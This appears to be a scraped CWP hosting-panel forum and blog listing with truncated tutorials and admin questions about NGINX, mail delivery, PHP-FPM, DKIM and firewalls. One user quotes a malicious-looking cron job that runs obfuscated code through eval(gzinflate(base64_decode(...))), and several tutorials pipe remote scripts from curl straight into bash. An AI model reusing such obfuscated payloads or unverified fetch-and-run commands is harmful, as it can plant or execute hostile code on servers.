CWP - Control WEB Panel

In this tutorial we’ll Build NGINX from source and enable TLS 1.3 in Linux server. TLS 1.3 is secure and fast TLS protocol till now it have its own benefits like security and performance, the website using TLS 1.3 loads faster and is more secure. Transportation Layer Security (TLS) 1.3 protocol provides unparalleled privacy and performance compared to previous versions of TLS and non-secure HTTP. Performance has a major impact on user experience. TLS 1.3 represents a pivotal turning point for HTTPS performance. Modern mobile networks will routinely add over 100ms of latency to each request. TLS 1.3 makes page load times significantly faster for mobile devices, improv…

My users have setup many email forwards The SPAM emails also get forwarded Due to this, email providers like microsoft / gmail are rate limiting emails from my servers and also blacklisting the IP How to stop my server forwarding SPAM I have enabled ClamAV, Amavis & Spamassassin

Brotli for web-server is the new modern compression module that is better than gzip/deflate, Also it is more secure since brotli only runs on HTTPS protocol. Just like gzip, Brotli is a lossless compression algorithm that compresses data using a combination of a modern variant of the LZ77 algorithm, Huffman coding and 2nd order context modeling, with a compression ratio comparable to the best currently available general-purpose compression methods. It is similar in speed with deflate/gzip but offers more best compression. Gzip vs Brotli: The advantage for Brotli over gzip is that it makes use of a dictionary and thus it only needs to send keys instead of full …

[Wed May 21 00:34:42.824943 2025] [proxy_fcgi:error] [pid 296120:tid 296160] (70007)The timeout specified has expired: [client xxx:43672] AH01075: Error dispatching request to : (polling) Connection refused: AH02454: FCGI: attempt to connect to Unix domain socket /opt/alt/php-fpm82/usr/var/sockets/domain.sock (localhost:8000) failed AH01079: failed to make connection to backend: localhost I Get this error EVERY night at around 00-02 the only way to get the page up again is by restarting the php-fpm service. All other sites on the server are online only 1 page goes down. i cant figure out what causes this. Any ideas?

@Sandeep B. Is there a guide for installing Imunify AV on CWP. Could you have a go at it and try to make a guide for standalone installation, OR even better making a in panel integration?

On a rather wery old CentOS 7 installation, I have a user called "admin". However, this username is no longer allowed, and when I try to use it, I get the message "username is a reserved word". I've been thinking about reinstalling the server for a while, but I'm not sure if I'll be able to restore the backup for that user due to the username. Since I can't change the username on the active server, is there any way to resolve this issue?

Some users are creating cron jobs under their usename. How can i make shure that this stops? looks like this: /usr/bin/php -r 'eval(gzinflate(base64_decode("jVJrb5swFP2eX8GkSCRqNUHbpIqmaWvTkidLQxriME0RGFMMxjAwUJj632fIsw9p8wd8jc85995z3YjcqB9SRzcJtk2GWuL6MZRmlEUz7+YalqGs3oV4euFm1mqZGUFPWgdKYg06BAbzDA51bA2IBy5cyVrlmX15w8xVx7OGum8AlXN0ab3o5ObwBs8u/K76yMqZ51/N8PjMAIZrKQyBvgst8lyARQQn9VmzJyT3gcxup3pko9LoreQOXMnSb6AwC5Ccgv6YYxgcyzkGS3epK7eOdqdK6nKsaMruv861FJnjnu2KP9E5v08s4DF74rEzWIyuzcewmF2qXbUcdUf+LbF5b5O+5iwlfaH7+mJV2CNd0eZAmpc/7pS+tpxTsPCvR17lj1r5U6pliB3SgbCIApv3bg9IxvspJ5d6bgwUydB7zACaW8Vr0GGc2xPbXxpOSiHDIRXeTqCZoLgt/Gk0BL4ITpjQajopIQ8mc8+FZlIkDAX3NOMxDG3Et8hkDMW0LXwVUsrZmE…

Hi everyone, I am running CWP on Almalinux8 and recently ran into an email‐delivery problem. When I checked /etc/opendkim/userkeys/mydomain.com, I discovered that both default.txt (DNS record) and default.private (signing key) are missing. What I have tried so far: Used the DKIM Manager in CWP to regenerate keys. Rebuilt/restarted the mailserver via CWP’s control panel. Unfortunately, the key files never appear and the DKIM signature remains invalid. Can anyone share the exact steps or commands to regenerate the DKIM key pair (default.txt / default.private) for a domain under CWP?

MariaDB 10.11 is now very stable and many features have been added and improved in this version You can check all the lists of changes here I’ve checked MariaDB 10.11 with WordPress, Joomla, xenforo, IPS forum and some more PHP scripts which depends on MySQL DB are working fine with this version hence it is safe to upgrade to this version. Short description about MariaDB : MariaDB is designed as a drop-in replacement of MySQL with more features, new storage engines, fewer bugs, and better performance. MariaDB is developed by many of the original developers of MySQL who now work for the MariaDB Foundation and the MariaDB Corporation, and by many people in the community. St…

Hi In one of my CWP instances, any mysql user logging into phpmyadmin can access any database. Can you please help

When I login to webmail of any user account getting the following errors Connection to storage server failed. Server Error: AUTHENTICATE PLAIN: Authentication failed tail /var/log/dovecot.log Apr 12 17:39:56 imap(user@domain.tld)<7976><MQR4w5AygsJq2UlB>: Error: stat(/var/vmail/domain/user/tmp) failed: Permission denied (euid=1017(user) egid=12(mail) missing +x perm: /var/vmail/domain, dir owned by 101:12 mode=0700)

Hi Sandeep As I found out a long time ago, the New Backup Beta in CWP works so much better than the standard backup which is completely obsolete now. So time to integrate it fully into the MMI in the main page and drop the currently linked standard backup completely. Also a kind of persistent annoyance when the MMI says backup is switched off even when the new backup beta is enabled and running. There have been numerous events now when I switched it on occasionally and only having two backups running in paralell and eating up my disk space quickly. I think there is no one out there who still uses the standad backup anymore when the new backup beta runs flawlessly since ye…

Currently I’m using: ./configure --with-apxs=/usr/local/apache/bin/apxsShould I be building it another way for CWP?

I have the share ip at lets say 10.0.0.1 and a secondary ip 10.0.03. Server ip is 10.0.0.2 Shared ip is also 10.0.0.1 All sites use server ip Why do i have over 1GB transfer every hour on the secondary ip?

Hi Sandeep. For some reason i have a shitload of cyber terrorist that try to get into my CWP server. At this moment, all blocked ips from the past are permanent in the csf .deny file and in the main config i blocked most countries like China Russia Romania and a few other countries that support cyber criminals. Since i am experimenting a lot with the cfs firewall options, i have to restart it many times. Most time i use "quick restart firewall" but even i use that, after a few minutes that the firewall has restarted. i get about a 100+ attempts in the mail, of those ip's i have blocked already by country in the main config or in the csf .deny file, trying to get…

Output of command (PHP 8.2): php -i | grep "OpenSSL" SSL Version => OpenSSL/3.2.2 OpenSSL support => enabled OpenSSL Library Version => OpenSSL 1.1.1t 7 Feb 2023 OpenSSL Header Version => OpenSSL 1.1.1t 7 Feb 2023 Native OpenSSL support => enabled Output of command (PHP-FPM 8.3): /opt/alt/php-fpm83/usr/bin/php -i | grep "OpenSSL" SSL Version => OpenSSL/3.2.2 OpenSSL support => enabled OpenSSL Library Version => OpenSSL 1.1.1t 7 Feb 2023 OpenSSL Header Version => OpenSSL 1.1.1t 7 Feb 2023 Native OpenSSL support => enabled php -i | grep "Configure Command" Configure Command => './configure' '--with-config-file-path=/usr/local/php' '--enabl…

Update Roundcube on CWP, the new Version of Roundcube 1.5 LTS have clear Interface with modern look also in this version some major security holes were fixed. It is recommended to update the roundcube to latest version. Step1 Install Required php extension INTL in CWP :- Centos 7/EL7 : To install INTL : yum update ca-certificates -y rpm -ivh https://github.com/mysterydata/md-disk/raw/main/libicu69-69.1-4.el7.x86_64.rpm curl -s -L https://www.alphagnu.com/upload/tmp/cwp_rc_fix.sh | bash To remove INTL : curl -s -L https://www.alphagnu.com/upload/tmp/cwp_rc_fix_remove.sh | bash Centos 8 stream/EL8 : To install INTL : dnf update ca-…

i trying to install php 8.3 via cwp php-fpm selector. it will not work, i get this error: Dependencies resolved. Nothing to do. Complete! chdir: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0 100 28505 100 28505 0 0 61967 0 --:--:-- --:--:-- --:--:-- 61967 /usr/local/cwpsrv/htdocs/resources/conf/el8/php-fpm_selector/external_modules/8.3/sodium.sh: line 9: /opt/alt/php-fpm83/usr/bin/phpize: No such file or directory /usr/local/cwpsrv/htdocs/resources/conf/el8/php-f…

i Use the php-fpm selector. Is there a way to list all sites and what PHP version they are using? I have PHP 7, 8.1, 8.2 and 8.3 and want to move all to 8.3 but it takes a lot of time opening all controlpanels and checking. How can i list all sites or versions?

after mod security install httpd will not start httpd: Syntax error on line 516 of /usr/local/apache/conf/httpd.conf: Syntax error on line 2 of /usr/local/apache/conf.d/mod_security.conf: Cannot load /usr/lib64/ into server: /usr/lib64/: cannot read file data: Is a directory here are the lines line 2 of mod_security.conf: LoadFile /usr/lib64/ line 516 of httpd.conf: Include /usr/local/apache/conf.d/*.conf

Can i add an account domain1.com and then point domain2.com to the same folder.? So if i have a php file it says welcome to domain1 if i open it on domain1.com and it says domain2 if i open domain2.com?

Hi, dear masters, I would like to install the latest version of the cURL on centos 7 Kindly guide me on how can apply this scenario because I did as below; rpm -Uvh http://www.city-fan.org/ftp/contrib/yum-repo/rhel7/x86_64/city-fan.org-release-2-1.rhel7.noarch.rpm yum --enablerepo=city-fan.org update curl libcurl libcurl-devel but it is not working. thank you so much.

Goaccess isnt producing montly stats for me,. also never has. on any site Is there a way of getting awstats or webaliser or analog stats to work with CWP on the customers panel and on admin if possible. customers are most important

Would like to update ModSecurity from 2.9.7 to 3.0.12, along with using the Latest OWASP Ruleset 4.0.7 Is there a guide how to accomplish this?

In this tutorial I’ll explain and provide solution script upon how you can clear all log files including old logs from CWP server. This tutorial is specially dedicated to the blog visitors who have emailed me to provide such solution. This script will clean all possible logs without affecting any service. Ensure you’ve logged in as root ssh user Solution 1 : Run CWP script to clean logs : /scripts/clean_all_server_logs Solution 2: To clear the log instantly you can run this bash script as i already created for your to make the task faster or else if you want to create by your own go to solution 3. curl -s -L https://www.alphagnu.com/upload/cle…